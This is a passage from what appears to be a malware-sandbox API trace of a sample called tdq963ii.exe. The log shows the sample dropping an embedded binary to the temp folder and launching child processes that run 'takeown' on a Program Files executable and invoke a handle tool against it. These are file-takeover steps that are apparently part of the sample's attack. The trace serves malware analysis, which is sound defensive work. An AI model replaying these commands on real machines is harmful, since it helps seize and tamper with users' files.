!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿX±\x07æäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0090.261] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x80) returned 0x519228 [0090.273] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0090.273] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0090.273] RtlSizeHeap (HeapHandle=0x500000, Flags=0x0, MemoryPointer=0x519228) returned 0x80 [0090.273] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0090.273] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0090.273] GetCurrentProcess () returned 0xffffffff [0090.274] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff34 | out: Wow64Process=0x18ff34) returned 1 [0090.274] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd28, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0090.274] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x18fb20, nSize=0x104 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x25 [0090.417] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0090.417] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0090.417] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0090.417] LockResource (hResData=0x43c648) returned 0x43c648 [0090.418] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x18) returned 0x5196f8 [0090.418] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x18f95c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.720] GetLastError () returned 0x20 [0090.720] GetLastError () returned 0x20 [0090.720] SetLastError (dwErrCode=0x20) [0090.720] GetLastError () returned 0x20 [0090.720] SetLastError (dwErrCode=0x20) [0090.720] GetLastError () returned 0x20 [0090.720] SetLastError (dwErrCode=0x20) [0090.720] GetLastError () returned 0x20 [0090.720] SetLastError (dwErrCode=0x20) [0090.720] GetLastError () returned 0x20 [0090.720] SetLastError (dwErrCode=0x20) [0090.720] GetLastError () returned 0x20 [0090.721] SetLastError (dwErrCode=0x20) [0090.721] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1000) returned 0x519718 [0090.721] WriteFile (in: hFile=0x80, lpBuffer=0x18ea08*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x18e334, lpOverlapped=0x0 | out: lpBuffer=0x18ea08*, lpNumberOfBytesWritten=0x18e334*=0x49, lpOverlapped=0x0) returned 1 [0090.722] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5187f8 | out: hHeap=0x500000) returned 1 [0090.723] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0090.723] ExitProcess (uExitCode=0x1) [0090.723] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5170b0 | out: hHeap=0x500000) returned 1 Process: id = "23" image_name = "takeown.exe" filename = "c:\\windows\\syswow64\\takeown.exe" page_root = "0x38901000" os_pid = "0xb38" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "16" os_parent_pid = "0x6c8" cmd_line = "takeown /F \"C:\\Program Files\\MSBuild\\absolutetelnet.exe\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 44 os_tid = 0x40c Process: id = "24" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x38f0a000" os_pid = "0x5d8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "16" os_parent_pid = "0x6c8" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"absolutetelnet.exe\" -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 45 os_tid = 0x798 [0090.674] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x3ffb84 | out: lpSystemTimeAsFileTime=0x3ffb84*(dwLowDateTime=0x83c4620, dwHighDateTime=0x1d68287)) [0090.674] GetCurrentProcessId () returned 0x5d8 [0090.674] GetCurrentThreadId () returned 0x798 [0090.674] GetTickCount () returned 0x114dfc5 [0090.674] QueryPerformanceCounter (in: lpPerformanceCount=0x3ffb7c | out: lpPerformanceCount=0x3ffb7c*=21101329418) returned 1 [0090.676] GetModuleHandleA (lpModuleName=0x0) returned 0x49da0000 [0090.676] __set_app_type (_Type=0x1) [0090.676] __p__fmode () returned 0x770331f4 [0090.676] __p__commode () returned 0x770331fc [0090.676] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49dc21a6) returned 0x0 [0090.676] __getmainargs (in: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c, _DoWildCard=0, _StartInfo=0x49dc4140 | out: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c) returned 0 [0090.677] GetCurrentThreadId () returned 0x798 [0090.677] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x798) returned 0x60 [0090.677] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0090.677] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0090.677] SetThreadUILanguage (LangId=0x0) returned 0x409 [0090.678] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0090.678] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x3ffb14 | out: phkResult=0x3ffb14*=0x0) returned 0x2 [0090.678] VirtualQuery (in: lpAddress=0x3ffb4b, lpBuffer=0x3ffae4, dwLength=0x1c | out: lpBuffer=0x3ffae4*(BaseAddress=0x3ff000, AllocationBase=0x300000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.678] VirtualQuery (in: lpAddress=0x300000, lpBuffer=0x3ffae4, dwLength=0x1c | out: lpBuffer=0x3ffae4*(BaseAddress=0x300000, AllocationBase=0x300000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0090.678] VirtualQuery (in: lpAddress=0x301000, lpBuffer=0x3ffae4, dwLength=0x1c | out: lpBuffer=0x3ffae4*(BaseAddress=0x301000, AllocationBase=0x300000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0090.679] VirtualQuery (in: lpAddress=0x303000, lpBuffer=0x3ffae4, dwLength=0x1c | out: lpBuffer=0x3ffae4*(BaseAddress=0x303000, AllocationBase=0x300000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.679] VirtualQuery (in: lpAddress=0x400000, lpBuffer=0x3ffae4, dwLength=0x1c | out: lpBuffer=0x3ffae4*(BaseAddress=0x400000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x120000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0090.679] GetConsoleOutputCP () returned 0x1b5 [0090.679] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0090.679] SetConsoleCtrlHandler (HandlerRoutine=0x49dbe72a, Add=1) returned 1 [0090.679] _get_osfhandle (_FileHandle=1) returned 0x80 [0090.679] SetConsoleMode (hConsoleHandle=0x80, dwMode=0x0) returned 0 [0090.679] _get_osfhandle (_FileHandle=1) returned 0x80 [0090.679] GetConsoleMode (in: hConsoleHandle=0x80, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 0 [0090.679] _get_osfhandle (_FileHandle=0) returned 0x3 [0090.679] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0090.679] GetEnvironmentStringsW () returned 0x6d2208* [0090.680] GetProcessHeap () returned 0x6c0000 [0090.680] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0xb8c) returned 0x6d2da0 [0090.680] FreeEnvironmentStringsW (penv=0x6d2208) returned 1 [0090.680] GetProcessHeap () returned 0x6c0000 [0090.680] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x4) returned 0x6cec08 [0090.680] GetEnvironmentStringsW () returned 0x6d2208* [0090.680] GetProcessHeap () returned 0x6c0000 [0090.680] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0xb8c) returned 0x6d3938 [0090.680] FreeEnvironmentStringsW (penv=0x6d2208) returned 1 [0090.680] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3fea84 | out: phkResult=0x3fea84*=0x68) returned 0x0 [0090.680] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3fea8c, lpData=0x3fea90, lpcbData=0x3fea88*=0x1000 | out: lpType=0x3fea8c*=0x0, lpData=0x3fea90*=0x0, lpcbData=0x3fea88*=0x1000) returned 0x2 [0090.680] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3fea8c, lpData=0x3fea90, lpcbData=0x3fea88*=0x1000 | out: lpType=0x3fea8c*=0x4, lpData=0x3fea90*=0x1, lpcbData=0x3fea88*=0x4) returned 0x0 [0090.680] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3fea8c, lpData=0x3fea90, lpcbData=0x3fea88*=0x1000 | out: lpType=0x3fea8c*=0x0, lpData=0x3fea90*=0x1, lpcbData=0x3fea88*=0x1000) returned 0x2 [0090.681] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3fea8c, lpData=0x3fea90, lpcbData=0x3fea88*=0x1000 | out: lpType=0x3fea8c*=0x4, lpData=0x3fea90*=0x0, lpcbData=0x3fea88*=0x4) returned 0x0 [0090.681] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3fea8c, lpData=0x3fea90, lpcbData=0x3fea88*=0x1000 | out: lpType=0x3fea8c*=0x4, lpData=0x3fea90*=0x40, lpcbData=0x3fea88*=0x4) returned 0x0 [0090.681] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3fea8c, lpData=0x3fea90, lpcbData=0x3fea88*=0x1000 | out: lpType=0x3fea8c*=0x4, lpData=0x3fea90*=0x40, lpcbData=0x3fea88*=0x4) returned 0x0 [0090.681] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3fea8c, lpData=0x3fea90, lpcbData=0x3fea88*=0x1000 | out: lpType=0x3fea8c*=0x0, lpData=0x3fea90*=0x40, lpcbData=0x3fea88*=0x1000) returned 0x2 [0090.681] RegCloseKey (hKey=0x68) returned 0x0 [0090.681] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3fea84 | out: phkResult=0x3fea84*=0x68) returned 0x0 [0090.681] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3fea8c, lpData=0x3fea90, lpcbData=0x3fea88*=0x1000 | out: lpType=0x3fea8c*=0x0, lpData=0x3fea90*=0x40, lpcbData=0x3fea88*=0x1000) returned 0x2 [0090.681] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3fea8c, lpData=0x3fea90, lpcbData=0x3fea88*=0x1000 | out: lpType=0x3fea8c*=0x4, lpData=0x3fea90*=0x1, lpcbData=0x3fea88*=0x4) returned 0x0 [0090.681] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3fea8c, lpData=0x3fea90, lpcbData=0x3fea88*=0x1000 | out: lpType=0x3fea8c*=0x0, lpData=0x3fea90*=0x1, lpcbData=0x3fea88*=0x1000) returned 0x2 [0090.681] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3fea8c, lpData=0x3fea90, lpcbData=0x3fea88*=0x1000 | out: lpType=0x3fea8c*=0x4, lpData=0x3fea90*=0x0, lpcbData=0x3fea88*=0x4) returned 0x0 [0090.681] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3fea8c, lpData=0x3fea90, lpcbData=0x3fea88*=0x1000 | out: lpType=0x3fea8c*=0x4, lpData=0x3fea90*=0x9, lpcbData=0x3fea88*=0x4) returned 0x0 [0090.681] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3fea8c, lpData=0x3fea90, lpcbData=0x3fea88*=0x1000 | out: lpType=0x3fea8c*=0x4, lpData=0x3fea90*=0x9, lpcbData=0x3fea88*=0x4) returned 0x0 [0090.681] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3fea8c, lpData=0x3fea90, lpcbData=0x3fea88*=0x1000 | out: lpType=0x3fea8c*=0x0, lpData=0x3fea90*=0x9, lpcbData=0x3fea88*=0x1000) returned 0x2 [0090.681] RegCloseKey (hKey=0x68) returned 0x0 [0090.681] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51e2a0 [0090.681] srand (_Seed=0x5f51e2a0) [0090.681] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"absolutetelnet.exe\" -nobanner" [0090.681] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"absolutetelnet.exe\" -nobanner" [0090.682] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0090.682] GetProcessHeap () returned 0x6c0000 [0090.682] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x210) returned 0x6d44d0 [0090.682] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x6d44d8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0090.683] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0090.683] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0090.683] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0090.683] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0090.683] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0090.683] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0090.683] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0090.683] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0090.683] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0090.683] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0090.683] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0090.683] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0090.683] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0090.683] GetProcessHeap () returned 0x6c0000 [0090.683] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x54) returned 0x6d46e8 [0090.684] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3ff850 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0090.684] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x3ff850, lpFilePart=0x3ff84c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3ff84c*="Desktop") returned 0x25 [0090.684] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0090.684] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x3ff5cc | out: lpFindFileData=0x3ff5cc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x6d2088 [0090.684] FindClose (in: hFindFile=0x6d2088 | out: hFindFile=0x6d2088) returned 1 [0090.684] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x3ff5cc | out: lpFindFileData=0x3ff5cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x6d2088 [0090.684] FindClose (in: hFindFile=0x6d2088 | out: hFindFile=0x6d2088) returned 1 [0090.684] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0090.684] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x3ff5cc | out: lpFindFileData=0x3ff5cc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x6d2088 [0090.684] FindClose (in: hFindFile=0x6d2088 | out: hFindFile=0x6d2088) returned 1 [0090.684] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0090.684] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0090.684] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0090.685] GetProcessHeap () returned 0x6c0000 [0090.685] HeapFree (in: hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6d2da0 | out: hHeap=0x6c0000) returned 1 [0090.685] GetEnvironmentStringsW () returned 0x6d2208* [0090.685] GetProcessHeap () returned 0x6c0000 [0090.685] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0xb8c) returned 0x6d2da0 [0090.685] FreeEnvironmentStringsW (penv=0x6d2208) returned 1 [0090.685] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0090.685] GetProcessHeap () returned 0x6c0000 [0090.685] HeapFree (in: hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6d46e8 | out: hHeap=0x6c0000) returned 1 [0090.685] GetProcessHeap () returned 0x6c0000 [0090.685] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x400e) returned 0x6d4f48 [0090.685] GetProcessHeap () returned 0x6c0000 [0090.685] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x7c) returned 0x6d2208 [0090.685] GetProcessHeap () returned 0x6c0000 [0090.685] HeapFree (in: hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6d4f48 | out: hHeap=0x6c0000) returned 1 [0090.685] GetConsoleOutputCP () returned 0x1b5 [0090.689] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0090.689] GetUserDefaultLCID () returned 0x409 [0090.692] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49dc4950, cchData=8 | out: lpLCData=":") returned 2 [0090.692] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x3ff990, cchData=128 | out: lpLCData="0") returned 2 [0090.692] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x3ff990, cchData=128 | out: lpLCData="0") returned 2 [0090.692] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x3ff990, cchData=128 | out: lpLCData="1") returned 2 [0090.692] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49dc4940, cchData=8 | out: lpLCData="/") returned 2 [0090.692] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49dc4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0090.692] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49dc4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0090.692] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49dc4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0090.692] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49dc4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0090.692] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49dc4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0090.692] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49dc4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0090.692] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49dc4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0090.692] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49dc4930, cchData=8 | out: lpLCData=".") returned 2 [0090.692] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49dc4920, cchData=8 | out: lpLCData=",") returned 2 [0090.692] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0090.694] GetProcessHeap () returned 0x6c0000 [0090.694] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x0, Size=0x20c) returned 0x6d2290 [0090.694] GetConsoleTitleW (in: lpConsoleTitle=0x6d2290, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0090.694] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0090.694] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0090.694] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0090.695] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0090.695] GetProcessHeap () returned 0x6c0000 [0090.695] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x400a) returned 0x6d4f48 [0090.695] GetProcessHeap () returned 0x6c0000 [0090.695] HeapFree (in: hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6d4f48 | out: hHeap=0x6c0000) returned 1 [0090.696] _wcsicmp (_String1="tdq963ii.exe", _String2=")") returned 75 [0090.696] _wcsicmp (_String1="FOR", _String2="tdq963ii.exe") returned -14 [0090.696] _wcsicmp (_String1="FOR/?", _String2="tdq963ii.exe") returned -14 [0090.696] _wcsicmp (_String1="IF", _String2="tdq963ii.exe") returned -11 [0090.696] _wcsicmp (_String1="IF/?", _String2="tdq963ii.exe") returned -11 [0090.696] _wcsicmp (_String1="REM", _String2="tdq963ii.exe") returned -2 [0090.696] _wcsicmp (_String1="REM/?", _String2="tdq963ii.exe") returned -2 [0090.696] GetProcessHeap () returned 0x6c0000 [0090.697] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x58) returned 0x6d46e8 [0090.697] GetProcessHeap 